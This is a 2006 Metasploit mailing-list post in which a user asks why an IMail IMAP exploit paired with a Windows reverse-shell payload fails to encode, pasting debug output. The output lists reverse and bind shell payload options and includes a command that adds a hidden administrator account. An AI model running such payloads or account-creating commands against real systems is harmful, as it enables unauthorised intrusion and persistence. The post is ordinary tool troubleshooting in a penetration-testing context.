Metasploit mailing list archives
FW: Getting "Error: No encoders succeeded" when trying to run imail_imap_delete(win32_reverse)
From: joewhite at cisco.com (Joe White (joewhite))
Date: Thu, 26 Oct 2006 19:32:48 -0700
I'm running Metasploit 2.6 with Linux. I've run several tests successfully, but I can't get this one to run : Here's the DebugLevel=5 output: msf debug(win32_reverse) > exploit AutoOpts setting EXITFUNC -> thread AutoOpts setting GETPCTYPE -> edx cmd_unix_reverse_nss failed, didn't match OS linux_ia32_bind_stg failed, didn't match OS cmd_localshell failed key check bsd_sparc_reverse failed, didn't match OS Payload: searching for opt=EXITFUNC type=V Win32Payload: returning Size of 435 Win32Payload: size on Msf::Payload::win32_passivex_vncinject=HASH(0xa4240e8) bsdi_ia32_reverse_stg failed, didn't match OS linux_ia32_reverse_impurity failed, didn't match OS cmd_generic failed key check bsdi_ia32_bind_stg failed, didn't match OS osx_ppc_reverse_nf_stg failed, didn't match OS osx_ppc_reverse failed, didn't match OS WinExec CMD: cmd.exe /c net user fwuser welcome /ADD && net localgroup Administrators fwuser /ADD Payload: searching for opt=EXITFUNC type=V Win32Payload: returning Size of 214 Win32Payload: size on Msf::Payload::win32_adduser=HASH(0xa6c8fc0) Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4444 Win32Payload: returning Size of 287 Win32Payload: size on Msf::Payload::win32_bind_meterpreter=HASH(0xa52f1e0) linux_ia32_adduser failed, didn't match OS Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4444 Win32Payload: returning Size of 287 Win32Payload: size on Msf::Payload::win32_bind_dllinject=HASH(0xa5b4270) Payload: searching for opt=EXITFUNC type=V Payload: searching for opt=LHOST type=ADDR Payload: replacing opt=LHOST type=ADDR value=192.168.8.116 Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4321 Win32Payload: returning Size of 287 Win32Payload: size on Msf::Payload::win32_reverse=HASH(0xa59f0d8) linux_sparc_findsock failed, didn't match OS linux_ia32_findrecv_stg failed, didn't match OS Payload: searching for opt=LHOST type=ADDR Payload: replacing opt=LHOST type=ADDR value=192.168.8.116 Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4321 Win32Payload: returning Size of 269 Win32Payload: size on Msf::Payload::win32_reverse_stg=HASH(0xa57de9c) Payload: searching for opt=LHOST type=ADDR Payload: replacing opt=LHOST type=ADDR value=192.168.8.116 Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4321 Win32Payload: returning Size of 269 Win32Payload: size on Msf::Payload::win32_reverse_dllinject=HASH(0xa537e60) linux_ia32_bind failed, didn't match OS cmd_interact failed, didn't match OS Payload: searching for opt=EXITFUNC type=V Win32Payload: returning Size of 435 Win32Payload: size on Msf::Payload::win32_passivex_meterpreter=HASH(0xa327660) bsdi_ia32_reverse failed, didn't match OS linux_ia32_reverse failed, didn't match OS Payload: searching for opt=EXITFUNC type=V Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4444 Win32Payload: returning Size of 317 Win32Payload: size on Msf::Payload::win32_bind=HASH(0xa5fde88) linux_ia32_exec failed, didn't match OS bsd_sparc_bind failed, didn't match OS Payload: searching for opt=LHOST type=ADDR Payload: replacing opt=LHOST type=ADDR value=192.168.8.116 Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4321 Win32Payload: returning Size of 269 Win32Payload: size on Msf::Payload::win32_reverse_stg_upexec=HASH(0xa4bdd10) cmd_irix_bind failed, didn't match OS cmd_sol_bind failed, didn't match OS bsd_ia32_bind failed, didn't match OS win32_findrecv_ord_meterpreter failed key check win32_findrecv_ord_vncinject failed key check bsd_ia32_bind_stg failed, didn't match OS osx_ppc_bind failed, didn't match OS Payload: searching for opt=LHOST type=ADDR Payload: replacing opt=LHOST type=ADDR value=192.168.8.116 Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4321 Win32Payload: returning Size of 269 Win32Payload: size on Msf::Payload::win32_reverse_vncinject=HASH(0xa6f634c) cmd_unix_reverse_bash failed, didn't match OS bsd_ia32_reverse_stg failed, didn't match OS Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4444 Win32Payload: returning Size of 287 Win32Payload: size on Msf::Payload::win32_bind_stg_upexec=HASH(0xa5dab20) solaris_ia32_bind failed, didn't match OS linux_sparc_reverse failed, didn't match OS osx_ppc_reverse_stg failed, didn't match OS Payload: searching for opt=LHOST type=ADDR Payload: replacing opt=LHOST type=ADDR value=192.168.8.116 Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4321 Win32Payload: returning Size of 269 Win32Payload: size on Msf::Payload::win32_reverse_meterpreter=HASH(0xa551034) linux_ia32_reverse_stg failed, didn't match OS WinExec CMD: Payload: searching for opt=EXITFUNC type=V Win32Payload: returning Size of 130 Win32Payload: size on Msf::Payload::win32_exec=HASH(0xa465738) solaris_sparc_bind failed, didn't match OS irix_mips_execve failed, didn't match OS win32_findrecv_ord_stg failed key check linux_ia32_findsock failed, didn't match OS win32_reverse_ord failed key check solaris_ia32_reverse failed, didn't match OS win32_reverse_ord_vncinject failed key check Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4444 Win32Payload: returning Size of 287 Win32Payload: size on Msf::Payload::win32_bind_vncinject=HASH(0xa44e6bc) bsdi_ia32_findsock failed, didn't match OS bsd_ia32_reverse failed, didn't match OS Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4444 Win32Payload: returning Size of 287 Win32Payload: size on Msf::Payload::win32_bind_stg=HASH(0xa5fddb0) Payload: searching for opt=EXITFUNC type=V Win32Payload: returning Size of 435 Win32Payload: size on Msf::Payload::win32_passivex_stg=HASH(0xa5a09c4) Payload: searching for opt=EXITFUNC type=V Win32Payload: returning Size of 435 Win32Payload: size on Msf::Payload::win32_passivex=HASH(0xa492c78) cmd_unix_reverse failed, didn't match OS bsd_ia32_findsock failed, didn't match OS bsd_ia32_findrecv_stg failed, didn't match OS linux_sparc_bind failed, didn't match OS generic_sparc_execve failed, didn't match OS osx_ppc_bind_stg failed, didn't match OS linux_ia32_findrecv failed, didn't match OS solaris_sparc_findsock failed, didn't match OS bsdi_ia32_bind failed, didn't match OS solaris_sparc_reverse failed, didn't match OS solaris_ia32_findsock failed, didn't match OS bsd_ia32_findrecv failed, didn't match OS osx_ia32_bind failed, didn't match OS linux_ia32_reverse_udp failed, didn't match OS osx_ppc_findrecv_stg failed, didn't match OS bsd_ia32_exec failed, didn't match OS Trying encoder Msf::Encoder::PexFnstenvMov PexFnstenvMov encoder failed key check Trying encoder Msf::Encoder::PexFnstenvSub PexFnstenvSub encoder failed key check Trying encoder Msf::Encoder::Countdown Countdown encoder failed key check Trying encoder Msf::Encoder::Pex Pex encoder failed key check Trying encoder Msf::Encoder::None None encoder failed key check Trying encoder Msf::Encoder::OSXPPCLongXORTag Msf::Encoder::OSXPPCLongXORTag failed, doesn't support all architectures payloadArch: x86 encoderArch: ppc Trying encoder Msf::Encoder::PexAlphaNum Payload: searching for opt=EXITFUNC type=V Payload: searching for opt=LHOST type=ADDR Payload: replacing opt=LHOST type=ADDR value=192.168.8.116 Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4321 Msf::Encoder::PexAlphaNum failed, encoded payload too large for exploit ExploitSpace: 614 EncodedLength: 661 MinNops: 0 MaxNops: 0 Trying encoder Msf::Encoder::JmpCallAdditive JmpCallAdditive encoder failed key check Trying encoder Msf::Encoder::Sparc Msf::Encoder::Sparc failed, doesn't support all architectures payloadArch: x86 encoderArch: sparc Trying encoder Msf::Encoder::ShikataGaNai ShikataGaNai encoder failed key check Trying encoder Msf::Encoder::Alpha2 Payload: searching for opt=EXITFUNC type=V Payload: searching for opt=LHOST type=ADDR Payload: replacing opt=LHOST type=ADDR value=192.168.8.116 Payload: searching for opt=LPORT type=n Payload: replacing opt=LPORT type=n value=4321 Trying mixed Msf::Encoder::Alpha2 failed, encoded payload too large for exploit ExploitSpace: 614 EncodedLength: 648 MinNops: 0 MaxNops: 0 Trying encoder Msf::Encoder::OSXPPCLongXOR Msf::Encoder::OSXPPCLongXOR failed, doesn't support all architectures payloadArch: x86 encoderArch: ppc Trying encoder Msf::Encoder::QuackQuack Msf::Encoder::QuackQuack failed, doesn't support all architectures payloadArch: x86 encoderArch: ppc Error: No encoders succeeded msf debug(win32_reverse) > Any suggestions on how I might proceed? thanks -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20061026/c11619cf/attachment.htm>
Current thread:
- FW: Getting "Error: No encoders succeeded" when trying to run imail_imap_delete(win32_reverse) Joe White (joewhite) (Oct 26)
- Message not available
- <Possible follow-ups>
- FW: Getting "Error: No encoders succeeded" when trying to run imail_imap_delete(win32_reverse) Joe White (joewhite) (Oct 26)